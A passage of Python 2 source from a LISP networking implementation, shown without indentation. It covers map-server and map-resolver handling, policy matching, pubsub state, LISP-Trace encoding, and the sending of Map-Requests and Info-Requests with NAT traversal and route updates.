if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return(None)
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return(packet)
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
if (nat_info and len(lisp_sockets) == 4):
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest,
nat_info, packet)
return
#endif
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
